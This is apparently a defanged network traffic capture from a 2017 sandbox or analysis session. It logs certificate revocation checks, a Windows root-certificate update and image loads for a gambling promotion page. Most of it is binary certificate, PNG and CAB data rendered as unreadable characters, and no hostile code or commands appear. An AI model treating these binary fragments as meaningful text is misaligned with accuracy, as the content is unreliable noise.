Content-Type: application/ocsp-response
0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Ari
zona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Dad
dy Root Validation Authority - G2..20170928022116Z0d0b0:0... .........
#o..K......#..... ...:....g(.....An ............20170928022116Z....201
70929142116Z0...*.H...................kw.gzl*..N|YI...........6...|.h.
.a...Y.Iws7...r.\*.9..b.%u.~.p..1.)MY.`..9`..5...j....x......$f ....G.
. 8$>..L...; W.c...k...v(....C..V.2..<qS?..iF....K^..{8........R
j...-..>...........\.D..":".....P....Y.}.0..9..=....AO..]..V....Z(.
s.g....L5..Q$........0...0..~0..f........T|....70...*.H........0..1.0.
..U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com
, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...161213070
000Z..171213070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scotts
dale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Au
thority - G20.."0...*.H.............0.............}...@.H..........j.b
.2.c....'eSA.....6""2.hf.m.m9........_N."gV..{.J"{..0f.W$.Xr....|U.F.!
.K.0 .(p......9.I......c.c\.9.xt.v.UN...%....,R....ZJ......rz.Z..p...r
u.6.....0..t....*...T.W.....?...X...( ..z.[. .A... z.[>-.y>...nv
U...g.wU........ Fh.6F...}.........0..0...U.......0.0...U...........0.
..U.%..0... .......0...U........J!~...}....^].....0... .....0......0@.
.U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..U. 
.C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0
...*.H.............=......|Q.y.kI$...T@.ff.m...1......\...10..T...<<< skipped >>>

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:24 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120878, public, no-transform, must-revalidate

Last-Modified: Thu, 28 Sep 2017 02:33:05 GMT

Expires: Fri, 29 Sep 2017 14:33:05 GMT

ETag: "939596d17cbb7a2f4b26cb05daf2862a03088c46"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1697

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Da
ddy Root Validation Authority - G1..20170928023305Z0f0d0<0... .....
.... ......]..J^.y_..F<........L.q.a.=....j...........2017092802330
5Z....20170929143305Z0...*.H.............f.f....O_.nF.....(D. .X......
...Li7..3.kW.sJ]s.\.Dz..^Syq...R..-.."Mw MP..=#.....E.[..5...e.....a..
_M..;lqS...E(T...^..G.x3....pv.q.S->-..c ...' .L.?.w..^4.....1.#|..
.X..%.uR$E3.TPV.Y". .La..}...i...W.v.!.)N....&{./M..I.^.bo..@I^A.....]
..Y....\.&g....$.N!M...b0..^0..Z0..B.......1g....r.0...*.H........0c1.
0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Clas
s 2 Certification Authority0...161213070000Z..211213070000Z0..1.0...U.
...US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, In
c.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.......
......0.............}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9.
......._N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.
xt.v.UN...%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?.
..X...( ..z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}....
.....0..0...U.......0.0...U...........0...U.%..0... .......0...U......
..J!~...}....^].....0... .....0......0=..U...60402.0...,hXXp://crl.god
addy.com/repository/gdroot.crl0J..U. .C0A0?..`.H...m....000... .......
."hXXp://crl.godaddy.com/repository/0...*.H...............f...gb.dI..F
.72.$.......?/.....5.9-F.=...c....c..Wg.U......j0....A..[O.A>".<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-2.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d3ec29983b37522cd9db90f3d051fa9f71505113149; expires=Tue, 11-Sep-18 06:59:09 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"59b2bfc5-59f"

Last-Modified: Fri, 08 Sep 2017 16:05:25 GMT

CF-Cache-Status: REVALIDATED

Expires: Tue, 11 Sep 2018 06:59:09 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 39c8be1d308b8e2b-DME

Cache: HIT

X-Cached-Since: 2017-09-11T06:59:09 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-09-25T14:09:52 00:00

X-ID: m9-up-e237
59f...PNG........IHDR...*...G.....q.......tEXtSoftware.Adobe ImageRead
yq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M
0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:x
mptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "&
gt; <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#
"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/
xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="h
ttp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe 
Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:06F7D5CF529F1
1E7BDC0E513E060F7A3" xmpMM:DocumentID="xmp.did:06F7D5D0529F11E7BDC0E51
3E060F7A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24449FC
6529111E7BDC0E513E060F7A3" stRef:documentID="xmp.did:06F7D5CE529F11E7B
DC0E513E060F7A3"/> </rdf:Description> </rdf:RDF> </x
:xmpmeta> <?xpacket end="r"?>.@......IDATx...AK.A..G...... ."
...D'..o._.s...t..t.N....]B..E%t...P.H'3.j....s(............x.o.0....*
?........V...>.s".|.?..h...'......-.....%. .b)../.VT.>.a...|.1."
..r..T....y..~...1G..!.].s* ....ir.|y7.@....F.J..R...3.'......$.; .H..
B.I&...".....-^.W...}4...\..A|.{*g./;=.w.\.c.}.>....A..A..A..A..A..
A..A..A..A..A..A..A....4.K.;.o1..``..............V.7ch.[..N..Gs...[...
...e'.d-..*g..4.'q\.....2g.T..eI.U....I<...m..,]X....9.K.<Il.C=.
.....%W....K....:.G...c8.j.L...#.>...fEkt..9?...G.@u.(V.....xF...mQ
...H..TV.?...3s..u.T.E.bK}.0...k.'L.5....IEND.B`...0......
<<< skipped >>>

GET /pokermatch/podarok200/images/app-macos-x.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=db71024b546714c4823dcbfc378c5675d1505112732; expires=Tue, 11-Sep-18 06:52:12 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"59b2bfc5-1f54"

Last-Modified: Fri, 08 Sep 2017 16:05:25 GMT

CF-Cache-Status: REVALIDATED

Expires: Tue, 11 Sep 2018 06:52:12 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 39c8b3f121708abc-KBP

Cache: HIT

X-Cached-Since: 2017-09-11T06:52:12 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-09-25T14:09:41 00:00

X-ID: m9-up-e237
1f54...PNG........IHDR.......&.....">......tEXtSoftware.Adobe Image
Readyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id=
"W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/"
 x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01      
  "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax
-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adob
e.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Reso
urceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocum
entID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp
.did:47D831FE52A511E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:47D83
1FD52A511E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015 
(Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e406bbd
8-b32b-ad43-b177-c791ebe91eb7" stRef:documentID="adobe:docid:photoshop
:84bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> &
lt;/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...s...jID
ATx..\.XUW..r....XPTTT...eD4.$.K....8.....c.dF.....$.Q...Q..(..b..]. .
.H."....Y....\.@2.{s.o}..}v;k........2..^oV...d...=......4d...X...F.y.
...@...y..S.....[.......!.Y...."P... 9."A.@.A..<^}P..*.|.u,@.......
T..eV.@U.pY.......9...u.d[..L.m~..........(.......-P...Q.s..;.......1.
4.^-.g.r.....R..q.J....w. --}..<.?.\....5U.th4...m...m..:..Pu N.Hu.
.......f........-**....x..qo%h.(.7.LV.FG..u......M.g..INN...`.R;.|.1.b
N.../~....-..IY..0..5.cdd.D.9w..[@......v..u'X...R...3G...'.k..6..<<< skipped >>>

GET /pokermatch/podarok200/images/text-200uah.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d9dcf8b80f4d9d2adcb452a1155c7f7a31505113149; expires=Tue, 11-Sep-18 06:59:09 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"59b2bfc5-2eca"

Last-Modified: Fri, 08 Sep 2017 16:05:25 GMT

CF-Cache-Status: MISS

Expires: Tue, 11 Sep 2018 06:59:09 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 39c8be1d35d14f20-DME

Cache: HIT

X-Cached-Since: 2017-09-11T06:59:09 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-09-25T14:10:01 00:00

X-ID: m9-up-e237
2eca...PNG........IHDR...>.................PLTE.............uX....U
;.T*....D)...........?.......z..D*.{d.C)....L).|...#..f.gR....E*.y..iT
.A)....za........;.{b..>....jU.?*.jW.F).......jT.@*.lU.}D.w..kT....
kR.......nT.?)..1..M.@*....K1..C....J1.N ........w..H.....z..9....N/..
..[E........=....\!.....~....O/..:.....6.....8..|..p..)..a....~^.p...g
..%.}P..H.."..j..V.J2.................................................
............~ ..........P/..........T..M1.q$.l&.Z,.W-.x"....] ....i'..
..{!....u#.......d)....b).f(.1!.n%._*....I1....mY.s$.G0....bM.?*.D-.^I
.E..N7.we....A,.W?....iU.......fQ.7&.R;.[D.......................l....
dW.....P.....=..3...........x..............$........-.r[..F.{O.oJ..2..
........}......>..C........S..'..2.....Z.....H.W .Q ....t>.q/...
....g7.m.....u.._%..9.i$.M).B4.......}0.yn..i............9......itRNS.
@..@0 ..w...B.`.?..e0@...0a...P0 X O.....P.@..o...p_.....`............
...............p....c................... .IDATx...ilLQ...Ik......SkmA.
.4v..>`.}....}..F..&.:...R. ....$.o. ...3u.3..w.....@...w...F..w...
......V.../T. ...!..t.j.N..]BB.K..T.fe....T._.l.... y.......%?.Z.Ud.W.
.......l..IB)W2j../_.>...'On..[...."Z.b.....lw$X,..c.H2.....a... .d
.G..-..\..S_!._]v...G.....J.0T..9../.(.......n.z.0.~....r.o...........
...'s..f...$...........H~.z...1.6S.NQ....[..t1i.$.....3.V...e.....8.7.
Y.f..-.V.{..Z.j....v...}................J..m;.A. .j.. ..cf..]....Z.<
;.q..I.14.......3......I.q9...._]....}.._..l.8.....Q.Q.Q...s/..=($.rW.
..;_w...!...!.......b.D..$.C$...LW..Q!.A}.....k......%.T..~!.~....<<< skipped >>>

GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:35 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=121568, public, no-transform, must-revalidate

Last-Modified: Thu, 28 Sep 2017 02:45:22 GMT

Expires: Fri, 29 Sep 2017 14:45:22 GMT

ETag: "192de15b904a49dcdaf0850804284d1c5035d7d7"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1777

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20170928024522Z0l0j0B0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,........2..rJ....20170928024522Z....2017092
9144522Z0...*.H................uI.=..&.3}. ...K....?y-..L-B..D.5..x...
..M..:,.e@'...L.A...\....LM.@ax....k{.\.............J.A..z4bN.R.......
fD=\..s.d.......$2...........N.f.?.cQ...u.....O......c].....Tc.W.$.& .
.u..4..P;.j....0.Z...2.....:........a./D.Q>'C)..........k...)m...6.
C9=-.pZ....0...0...0..........3....xXc0...*.H........0..1.0...U....US1
.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 
..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure 
Certificate Authority - G20...161213070000Z..171213070000Z0x1.0...U...
.US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0).
.U..."Go Daddy Validation Authority - G20.."0...*.H.............0.....
........}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9........_N."g
V..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.xt.v.UN...%.
...,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?...X...( ..z.
[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}..........0..0..
.U.......0.0...U...........0...U.%..0... .......0...U........J!~...}..
..^].....0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/re
pository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ...
....."hXXp://crl.godaddy.com/repository/0...*.H.............&...r.

<<< skipped >>>

GET /gdig2s1-455.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:52 GMT

Server: Apache

Last-Modified: Wed, 27 Sep 2017 03:30:24 GMT

ETag: "ca68-55a2369817400"

Accept-Ranges: bytes

Content-Length: 51816

Cache-Control: max-age=259200

Expires: Sun, 01 Oct 2017 03:12:52 GMT

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Connection: close

Content-Type: application/pkix-crl

0..d0..L...0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U...
.Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy
.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G2.
.170927033023Z..171004033023Z0..a0(....?....\...170330133457Z0.0...U..
.....0'..J&.Cb..X..170717173333Z0.0...U.......0(.......@.<...170331
144754Z0.0...U.......0(.....~.k7.k..170330221728Z0.0...U.......0'..8f.
ucG.*..170402013054Z0.0...U.......0(.....6h......170416202854Z0.0...U.
......0(......wy.KO..170602125026Z0.0...U.......0'....a.......17033122
5354Z0.0...U.......0(....5........170330221540Z0.0...U.......0'..|..r 
.....170420121854Z0.0...U.......0'..q/.....7..170415160054Z0.0...U....
...0(....7....I...170511172415Z0.0...U.......0(......w...Q..1705121700
15Z0.0...U.......0(.....k.5.....170526161215Z0.0...U.......0'..3..j..b
...170331161454Z0.0...U.......0(....QF..2.o..170401133354Z0.0...U.....
..0(......f.Y.D..170701215933Z0.0...U.......0'..GL....H...170530154626
Z0.0...U.......0'..h...`.-...170510152515Z0.0...U.......0(.....}..|4..
.170428021807Z0.0...U.......0(........>.4..170331202154Z0.0...U....
...0'..<.....R...170405145254Z0.0...U.......0'..X.]...L...170407165
054Z0.0...U.......0(......&i.d...170401121454Z0.0...U.......0'..5....3
7...170401062654Z0.0...U.......0'..d5....\k..170528171815Z0.0...U.....
..0(....j.I~.j...170331230754Z0.0...U.......0(.....C.......17033120105
4Z0.0...U.......0'..Z.H.`..o..170401201554Z0.0...U.......0'..{u.3..oG.
.170528012815Z0.0...U.......0(.....V.......170330170449Z0.0...U...

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.usertrust.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:58 GMT

Server: Apache

Last-Modified: Mon, 25 Sep 2017 21:19:01 GMT

Expires: Mon, 02 Oct 2017 21:19:01 GMT

ETag: 5A9FD501F956779F1497BE2BD6DE25CED4D61D4F

Cache-Control: max-age=410162,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: rmdccaocsp20

Content-Length: 471

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........z4.&...&T....$.T...2017092
5211901Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
.'f.V.I....p...."....20170925211901Z....20171002211901Z0...*.H........
...............e. ..yR..@o:.......h/D$a.....K.8.w.._.0{.[$.$......eI..
B.{....aV\......^..a.b|.M......NK..o...j.a.W....9...x.\.Y.`.^...A...{.
.>....j....v...".....C=..U8.......H.`....n.%R.`h...O..(</...>
.K\`..1...._..s.]e.......'..f...`..U.........2.\........!.f...

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK

Server: nginx

Content-Type: application/ocsp-response

Content-Length: 527

ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD58"

Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC

Cache-Control: public, no-transform, must-revalidate, max-age=9588

Expires: Thu, 28 Sep 2017 05:52:21 GMT

Date: Thu, 28 Sep 2017 03:12:33 GMT

Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
 Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv....A..;>
Vdz.'V....20170926100000Z....20171003100000Z0...*.H.............%....&
gt;..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?........6
V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8V..\j...;
..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....aA..X4..].
....^z..l....Qn..L........-...Y...O=..........HTTP/1.1 200 OK..Server:
 nginx..Content-Type: application/ocsp-response..Content-Length: 527..
ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD5
8"..Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC..Cache-Control: publi
c, no-transform, must-revalidate, max-age=9588..Expires: Thu, 28 Sep 2
017 05:52:21 GMT..Date: Thu, 28 Sep 2017 03:12:33 GMT..Connection: kee
p-alive..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U
....Let's Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300
Z0u0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv...
.A..;>Vdz.'V....20170926100000Z....20171003100000Z0...*.H..........
...%....>..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?
........6V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8
V..\j...;..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....a
A..X4..].....^z..l....Qn..L........-...Y...O=............<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: isrg.trustid.ocsp.identrust.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 02:58:07 GMT

Content-transfer-encoding: Binary

last-modified: Wed, 27 Sep 2017 21:37:18 GMT

ETag: "196936375e8bf9b887f524c99b256c011efed3bd"

expires: Thu, 28 Sep 2017 21:37:18 GMT

cache-control: max-age=43200,public,no-transform,must-revalidate

Content-Type: application/ocsp-response

Content-Length: 1398
0..r......k0..g.. .....0.....X0..T0........ ..zJ.!.I...u(......2017092
7213718Z0s0q0I0... ........o.hMC..Hb... =G,../.......{,q...K.u...`....
...AB...S.sj.........20170927213718Z....20170928213718Z0...*.H........
.......t.......t.I.........f..Q].1..@....DF.M..h:x.4.`...I61....8=hS..
.......k.....u....#..&..>.#/m......J.B.q.....@...I1.q..c.\NY.....^l
../..k..e.&.L.T.n...>"......lU.....=aj..f.Cq_....E.a..#`q..y.'%K. .
.E..<.......b..c.......sO..."...`).".X.SV!....g1sN.p...).....0...0.
..0..{.........AB...[.s^*(R.40...*.H........0?1$0"..U....Digital Signa
ture Trust Co.1.0...U....DST Root CA X30...170510174115Z..180510174115
Z0..1.0...U....US1 0...U....Digital Signature Trust1.0...U....DST1.0..
.U....DST CA X3 OCSP Signer1$0"..*.H........pki-ops@IdenTrust.com0.."0
...*.H.............0.........C#......}.>.....r....P..%b.b....mh...O
....c.?..1_...O....9.K.6I.#O..6\..`..`~.5..&.!y....;..Y.Fcob.}....nz..
V.......F...{.2.4....AIt........s..lgQ..v...P7....)dk..`...../{..^N...
%-../-.z.|w.9..TFw.(...g....K=6..xr.B9..d{..Lf......T....t.........1ne
.7.t.........F0D0...U.......0.0...U...........0... .....0......0...U.%
..0... .......0...*.H..............p.A....o.....L.c.J.-5.h.nbE.r0\...)
3}..e.Lo.U.......&......l....$...........I...BI..Y.#..y(<h.?....i7.
..d...'k..A....H.$.6BP.*.o..\..`rh....oR.#..._}_.F.V..j..v>.}=Z.I..
O...QOr3.b.3.2.~ht./2t#d..M.}.?..T...$=....C...h....7F....2..]....'.P.
........M.@>.;.W..<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Cache-Control: max-age = 86408

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT

If-None-Match: "8017f9a85f10d21:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK

Cache-Control: max-age=604800

Content-Type: application/vnd.ms-cab-compressed

Last-Modified: Fri, 22 Sep 2017 22:03:52 GMT

Accept-Ranges: bytes

ETag: "014e8acee33d31:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Content-Length: 53978

Date: Thu, 28 Sep 2017 03:12:22 GMT

Connection: keep-alive

X-CCC: SE

X-CID: 2
MSCF............,...................I.................6K.u .authroot.s
tl.~.F..6..CK...8........i.g.B.A....%.k..5d.NI..RR".nTB.i/.].DQJ.,..".
X.g....N.......u...<.....{ .."'=..x..16...q.;.&'.4....a...e....#M..
.3..c`L.*3..|1.&_L ..._.i.h....J7.k..x.p..jEE....8d#......`....Mo.9AE.
...r<B.v'R....p"....e...f..g.t.<. Bs.x.8a.9;P..AD.._...9..h...g.
..<..!wj..........E1Nx ..^..S...-.l_.!..U.81X$..o.2..iz.a.Ez..S....
^._.<3}.S...l......x.....B..?....P0$....?y....w.`.f.:g0v..ZP..y.U.`
>... ..Z.cy..LU2..N..(......i........ ..`..y..c.Y.fzF0CG.@..Fe2.j.0
......{...]..4;dX..........a...T.0..]....Utv..!..p.M...'T_ b.;.#.\-..]
.T*......d.....`..#_2..........xKB.E.B...y...d.s..lP.;..?#._..#./.L|..
h!......R.....e_o."V..v.......Js.../E..1......3..3..G.8...........lZ.?
.B.)dW...7....?..MhZm.k......iO.....5.....{l.....t}...g..h.C.....v...{
..F.C)vO.3y...wX.M....V.....T......#..q..B.........V...r..H.B .x.tX`l.
<.P...JY...h).e...Z...Z...ku.B.....^.=.`D..|.-...U/l;r.......{-h..g
._B.Y.a.[l..l..'.h.[2.4.\u.....(R8..,.....i....x....w..z..%.=.@#a....!
./....>...g...-.,>..6!.K..e..z..kh.0.n4....9.l2u.C..'.]Nh..c<
.......KM...k.....e......./...F4hn:....u.\.C.M....OI.ZmT..co......C.).
....c...v.r.u....5./...\.....l....7=.`..{....`..>.bUQ..I.........n.
.f.hf..*......M.:[S.W....e_.........c'..A'.$..9.,p..0...... .b0.....k1
.Z.........u4d.....]..p.f......Vk.'z:....f9}8.6...].D6P.....z.).C.-BF.
.F...P.......$..d....c0Z0.......3..K........... .. k....._.:..x.F.C...
.7.P.l..1.%.lCJ.N.."...w... .%?;xT.&_Ew.s.......e.k&..^#.. ..U?.9.<<< skipped >>>

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:13:03 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120841, public, no-transform, must-revalidate

Last-Modified: Thu, 28 Sep 2017 02:33:05 GMT

Expires: Fri, 29 Sep 2017 14:33:05 GMT

ETag: "939596d17cbb7a2f4b26cb05daf2862a03088c46"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1697

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Da
ddy Root Validation Authority - G1..20170928023305Z0f0d0<0... .....
.... ......]..J^.y_..F<........L.q.a.=....j...........2017092802330
5Z....20170929143305Z0...*.H.............f.f....O_.nF.....(D. .X......
...Li7..3.kW.sJ]s.\.Dz..^Syq...R..-.."Mw MP..=#.....E.[..5...e.....a..
_M..;lqS...E(T...^..G.x3....pv.q.S->-..c ...' .L.?.w..^4.....1.#|..
.X..%.uR$E3.TPV.Y". .La..}...i...W.v.!.)N....&{./M..I.^.bo..@I^A.....]
..Y....\.&g....$.N!M...b0..^0..Z0..B.......1g....r.0...*.H........0c1.
0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Clas
s 2 Certification Authority0...161213070000Z..211213070000Z0..1.0...U.
...US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, In
c.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.......
......0.............}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9.
......._N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.
xt.v.UN...%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?.
